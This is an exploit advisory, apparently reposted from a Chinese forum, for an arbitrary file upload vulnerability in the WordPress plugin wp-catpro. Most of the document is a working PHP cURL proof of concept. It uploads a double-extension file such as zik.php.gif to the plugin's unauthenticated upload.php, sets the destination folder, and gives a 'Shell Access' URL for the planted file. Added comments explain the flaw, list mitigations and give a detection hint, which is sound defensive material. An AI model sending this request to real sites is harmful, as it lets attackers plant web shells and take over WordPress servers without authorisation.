WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
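<?php
// Proof-of-concept request as given in the advisory, with the forum's
// anti-copy noise stripped from the listing (the garbled characters made the
// script invalid PHP). Request, field names and values are unchanged.
//
// Defender's view of why this matters: the plugin's upload.php allows the
// extensions ("jpg", "gif", "png"), yet the advisory reports that a name such
// as shell.php.gif is accepted — presumably only the trailing extension is
// compared against the allowlist (confirm against the plugin source). Whether
// the stored file is then executed as PHP depends on the web server's handler
// configuration — TODO confirm per environment. The request below carries no
// session cookie, which suggests the endpoint is reachable unauthenticated —
// verify. Mitigations: reject filenames with more than one extension or
// containing "php", derive the stored extension from the allowlist instead of
// the client-supplied name, validate content server-side, disable script
// execution in the uploads directory, require an authenticated/nonce-checked
// request, and never honour a client-supplied destination such as the
// 'folder' field.

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>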
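<?php
// Content of the test file the PoC uploads (noise characters removed from the
// listing). It is a benign marker: if requesting the stored file renders the
// PHP configuration page, the server executed the upload as PHP.
// Detection hint: alert on newly written files matching *.php.* under
// wp-content/uploads and on requests to such paths.
phpinfo();
?>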